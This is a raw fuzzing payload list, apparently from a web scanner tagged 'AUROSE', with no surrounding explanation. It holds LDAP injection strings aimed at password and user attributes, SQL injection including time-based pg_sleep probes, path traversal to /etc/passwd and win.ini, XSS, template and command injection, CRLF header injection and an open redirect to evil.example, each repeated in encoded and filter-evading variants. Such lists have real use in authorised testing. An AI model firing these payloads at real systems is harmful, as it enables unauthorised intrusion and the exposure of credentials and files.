*)(uid=*))(|(uid=*
*)(|(mail=*))
admin*)(|(password=*))
*)(cn=*))(|(cn=*
*()|&'
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A
%2A%29%28%7C%28mail%3D%2A%29%29
admin%2A%29%28%7C%28password%3D%2A%29%29
%2A%29%28cn%3D%2A%29%29%28%7C%28cn%3D%2A
%2A%28%29%7C%26%27
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
*)(UID=*))(|(UID=*
*)(|(MAIL=*))
ADMIN*)(|(PASSWORD=*))
*)(CN=*))(|(CN=*
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2A%29%28UID%3D%2A%29%29%28%7C%28UID%3D%2A
%2A%29%28%7C%28MAIL%3D%2A%29%29
ADMIN%2A%29%28%7C%28PASSWORD%3D%2A%29%29
%2A%29%28CN%3D%2A%29%29%28%7C%28CN%3D%2A
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
*)(uid%3D*))(|(uid%3D*
*)(|(mail%3D*))
admin*)(|(password%3D*))
*)(cn%3D*))(|(cn%3D*
' OR '1'%3D'1
" OR "1"%3D"1
*)(UID%3D*))(|(UID%3D*
*)(|(MAIL%3D*))
ADMIN*)(|(PASSWORD%3D*))
*)(CN%3D*))(|(CN%3D*
*)(uid=*))(|(uid=*?v=0
*)(uid=*))(|(uid=*&v=0
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A_0
ldap_0
/ldap/0
*)(uid=*))(|(uid=*%0a0
*)(|(mail=*))?v=1
*)(|(mail=*))&v=1
%2A%29%28%7C%28mail%3D%2A%29%29_1
ldap_1
/ldap/1
*)(|(mail=*))%0a1
admin*)(|(password=*))?v=2
admin*)(|(password=*))&v=2
*)(&
%2A%29%28%26
%252A%2529%2528%2526
*)(&?aurose=1
*)(&&aurose=1
%252A%2529%2528uid%253D%252A%2529%2529%2528%257C%2528uid%253D%252A
*)(uid%3d*))(|(uid%3d*
*)(uid=*))(|(uid=*?aurose=1
*)(uid=*))(|(uid=*&aurose=1
admin)(|(password=*))
admin%29%28%7C%28password%3D%2A%29%29
admin%2529%2528%257C%2528password%253D%252A%2529%2529
admin)(|(password%3d*))
ADMIN)(|(PASSWORD=*))
admin)(|(password=*))?aurose=1
admin)(|(password=*))&aurose=1
*)(|(cn=*))
%2A%29%28%7C%28cn%3D%2A%29%29
%252A%2529%2528%257C%2528cn%253D%252A%2529%2529
*)(|(cn%3d*))
*)(|(CN=*))
*)(|(cn=*))?aurose=1
*)(|(cn=*))&aurose=1
)(uid=*))(|(uid=*
%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A
%2529%2528uid%253D%252A%2529%2529%2528%257C%2528uid%253D%252A
)(uid%3d*))(|(uid%3d*
)(UID=*))(|(UID=*
)(uid=*))(|(uid=*?aurose=1
)(uid=*))(|(uid=*&aurose=1
*))%00
%2A%29%29%2500
%252A%2529%2529%252500
*))%00?aurose=1
*))%00&aurose=1
*)(mail=*)
%2A%29%28mail%3D%2A%29
%252A%2529%2528mail%253D%252A%2529
*)(mail%3d*)
*)(MAIL=*)
*)(mail=*)?aurose=1
*)(mail=*)&aurose=1
*)(userPassword=*)
%2A%29%28userPassword%3D%2A%29
%252A%2529%2528userPassword%253D%252A%2529
*)(userPassword%3d*)
*)(USERPASSWORD=*)
*)(userPassword=*)?aurose=1
*)(userPassword=*)&aurose=1
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
*)(&::var0
%2A%29%28%26::v0
/ldap/probe/0
*)(uid=*))(|(uid=*::var1
%2A%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A::v1
/ldap/probe/1
admin)(|(password=*))::var2
admin%29%28%7C%28password%3D%2A%29%29::v2
/ldap/probe/2
*)(|(cn=*))::var3
%2A%29%28%7C%28cn%3D%2A%29%29::v3
/ldap/probe/3
)(uid=*))(|(uid=*::var4
%29%28uid%3D%2A%29%29%28%7C%28uid%3D%2A::v4
/ldap/probe/4
*))%00::var5
%2A%29%29%2500::v5
/ldap/probe/5
*)(mail=*)::var6
%2A%29%28mail%3D%2A%29::v6
/ldap/probe/6
*)(userPassword=*)::var7
%2A%29%28userPassword%3D%2A%29::v7
/ldap/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/ldap/probe/8
" OR "1"="1::var9
%22%20OR%20%221%22%3D%221::v9
/ldap/probe/9
' AND 1=1 --::var10
%27%20AND%201%3D1%20--::v10
/ldap/probe/10
' AND 1=2 --::var11
%27%20AND%201%3D2%20--::v11
/ldap/probe/11
